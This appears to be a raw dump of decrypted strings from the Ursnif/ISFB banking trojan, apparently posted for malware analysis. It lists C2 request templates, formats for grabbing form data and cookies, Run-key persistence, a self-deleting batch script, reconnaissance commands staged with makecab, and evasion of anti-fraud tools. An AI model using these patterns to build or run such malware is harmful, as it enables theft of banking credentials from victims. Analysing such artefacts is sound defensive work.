ursnif bss section

1. KERNEL32.DLL AddVectoredExceptionHandler VirtualProtect ADVAPI32.DLL CryptGetUserKey LoadLibraryExW CHROME.DLL soft=1&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x&guid=%08x%08x%08x%08x version=%u&soft=1&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&guid=%08x%08x%08x%08x Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) ; Win64; x64 http:// https:// \\.\%s USER.ID %lu.exe /upd %lu Software\AppDataLow\Software\Microsoft\ Main Block Temp Client Ini Keys Scr Install LastTask LastConfig CrHook OpHook Exec NetCfg . \ http://constitution.org/usdeclar.txt C:\Program Files\Internet Explorer\iexplore.exe Software\Microsoft\Windows\CurrentVersion\Run System\CurrentControlSet\Control\Session Manager\AppCertDlls text image json html javascript URL: %s
2. user=%s
3. pass=%s URL: %s
4. REF: %s
5. LANG: %s
6. AGENT: %s
7. COOKIE: %s
8. POST: USERID: %s
9. USER: %s
10. DEVICE: %s
11. CLASS: %s
12. INTERFACE: %s
13. ADD: %u
14. @%s@ grabs= HIDDEN %08x%08x%08x%08x @ID@ @GROUP@ @URL=*@ %s.%s http .bat .bin 64 Local\ \\.\pipe\ \Microsoft\ %APPDATA%\Microsoft\ %APPDATA% form log keys POST GET -01 --------------------------%04x%04x%04x Content-Type: multipart/form-data; boundary=%s Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" Content-Disposition: form-data; name="upload_file"; filename="%s" Content-Type: application/octet-stream --%s
15. %s
16. %s
17.  
18.  
19. --%s--
20. {%08X-%04X-%04X-%04X-%08X%04X} %08X-%04X-%04X-%04X-%08X%04X D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) S:(ML;;NRNWNX;;;LW) D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1) NSS3.DLL o p e n %lu.bat attrib -r -s -h %%1
21. :%u
22. del %%1
23. if exist %%1 goto %u
24. del %%0
25. \Vars \Files \Config \Run /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s /UPD /SD /sd %lu client.dll client64.dll SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID ProductName CurrentVersion InstallDate C:\ \Software\Microsoft\Windows\CurrentVersion SystemRoot ** Accept-Encoding: cmd /C "%s> %s1" % A P P D A T A % \ M o z i l l a \ F i r e f o x \ P r o f i l e s NSPR4.DLL \ M a c r o m e d i a \ F l a s h P l a y e r \ SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings c o o k i e s . s q l i t e OPERA.EXE c o o k i e s . s q l i t e - j o u r n a l NTDLL.DLL * . s o l WININET.DLL * . t x t WS2_32.DLL ieapfltr \ c o o k i e . f f Referer: \ c o o k i e . i e Accept-Language: \ s o l s WSOCK32.DLL \ \ ? \ EnableSPDY3_0 * . * I S F B WININET.dll Cookie: Content-Security-Policy: - - u s e - s p d y = o f f g i f j p e g VERSION.dll driverquery.exe > % 0 2 u - % 0 2 u - % 0 2 u % 0 2 u : % 0 2 u : % 0 2 u
26.  
27. % s
28.  
29. % s
30.  
31.  
32.  
33. % s
34.  
35.  
36.  
37. % 0 2 u - % 0 2 u - % 0 2 u % 0 2 u : % 0 2 u : % 0 2 u
38.  
39. C l i p b o a r d
40.  
41.  
42.  
43. % s
44.  
45.  
46.  
47. identity W i n d o w s E x p l o r e r kernelbase Transfer-Encoding: D e l e g a t e E x e c u t e S O F T W A R E \ C l a s s e s \ C h r o m e c o m m a n d * . * ieframe urlmon ieui mshtml inetcpl.cpl NTDSAPI.DLL Host: User-Agent: Connection: Content-MD5: Content-Type: Content-Length: Content-Security-Policy-Report-Only: X-Frame-Options Access-Control-Allow-Origin: %x
48. ocsp chunked
49.  
50. HTTP/1.1 404 Not Found
51.  
52. %02u:%02u:%02u EMPTY
53. Cmd %s processed: %u | "%s" | %u
54. Cmd %u parsing: %u PR_Read PR_Write PR_Close .set MaxDiskSize=0
55. .set DiskDirectory1="%s"
56. .set CabinetName1="%s"
57. .set DestinationDir="%S"
58. "%s"
59. \setup.inf \setup.rpt makecab.exe /F "%s" systeminfo.exe tasklist.exe /SVC > reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s > cmd /U /C "type %s1 > %s & del %s1" net view > nslookup 127.0.0.1 > echo -------- > Unknown .pfx My AddressBook AuthRoot CertificateAuthority Disallowed Root TrustedPeople TrustedPublisher InternetSetStatusCallback HttpAddRequestHeadersW HttpAddRequestHeadersA HttpQueryInfoW HttpQueryInfoA InternetConnectW InternetConnectA InternetQueryDataAvailable HttpSendRequestW HttpSendRequestA InternetReadFileExW InternetReadFileExA InternetWriteFile InternetReadFile HttpOpenRequestW HttpOpenRequestA InternetCloseHandle recv closesocket WSASend WSARecv RegQueryValueExW RegGetValueW PR_Poll PR_GetError PR_SetError ExitProcess IsWow64Process Wow64EnableWow64FsRedirection LdrRegisterDllNotification LdrUnregisterDllNotification CreateProcessA CreateProcessW CreateProcessAsUserA CreateProcessAsUserW ZwProtectVirtualMemory LdrLoadDll LdrGetProcedureAddress RtlSetUnhandledExceptionFilter LoadLibraryA RtlExitUserThread %02u-%02u-%02u %02u:%02u:%02u
60. PluginRegisterCallbacks .rdata .text .data DLL load status: %u %s=%s& 0123456789ABCDEF Main Blocked
61. user_pref("network.http.spdy.enabled", false); /images/ Content-Encoding: p r e f s . j s %s=%s& .jpeg .gif .bmp %c%02X gzip deflate RapportGP RapportGP_x64 InternetGetCookieExA InternetGetCookieA Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{ }\ Flags Version * PhishWall5.1.exe \Mozilla\Firefox\Profiles\* \extensions\info.asia@securebrain.co.jp.xpi firefox.exe SOFTWARE\SecureBrain\PhishWall 8CA7E745-EF75-4E7B-BB86-8065C0CE29CA BB62FFF4-41CB-4AFC-BB8C-2A4D4B42BBDC sbpwu.exe iexplore.exe sbpw32.dll SBP2GIsPwUrlEx SBP2GIsPwUrlEx2 S:(ML;;NRNWNX;;;LW) HTTP/1.1 502 Bad Gateway
62. Content-Length: 19
63.  
64. 502 Gateway Timeout Id = %u; Action = %u; ErrorCode = %u
65. HTTP/1.1 crashdump.cab \info.txt g_BuildNumber = %u
66. g_CurrentModule = 0x%p
67. text section = 0x%p
68. SizeOfRawData = %u
69. ExceptionAddress = 0x%p
70. ExceptionCode = 0x%x \dump.dmp DBGHELP.DLL MiniDumpWriteDump GIF 87a 89a !ÿNETSCAPE2.0